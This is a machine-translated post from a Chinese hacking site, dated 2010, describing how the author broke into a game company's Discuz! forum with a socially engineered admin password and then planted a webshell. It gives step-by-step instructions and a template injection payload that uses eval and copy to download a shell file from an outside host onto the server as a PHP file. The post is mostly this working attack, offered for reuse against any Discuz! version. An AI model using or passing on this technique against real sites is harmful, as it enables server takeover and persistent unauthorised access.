Discuz! The latest to get Webshell method, test possible-vulnerability warning-the black bar safety net

ID MYHACK58:62201026571
Type myhack58
Reporter 佚名
Modified 2010-03-28T00:00:00


Discuz! The latest to get Webshell method, the test feasible

Inadvertently invaded the game's official website, can not get Webshell, the depressed found that there is a Discuz! Forum, immediately according to have to get the password of social workers, Oh, and actually successfully into the backend! But after all is the 6. 0+the version of the administrator of the copyright removed, the online known to edit the template, template editing function by the limit is a way to get the SHELL was very unhappy, and remember to edit any template file, and then eval the SHELL method, finally! The following is the implementation of the method steps of: The current pass to eat all the DZ version. 1. Pick a template file, select Edit 2. Looking for a space to upload a webshell, assuming that its address is<http://www.abc.com/shell.txt> 3. In any position of the input: {eval copy('http://www.abc.com/shell.txt', DISCUZ_ROOT.'./ forumdata/shell.php');} 4. Save, refresh 5. To access the template belongs to the file 6. Put the template back

You're done, access/forumdata/shell. php is a lovely horse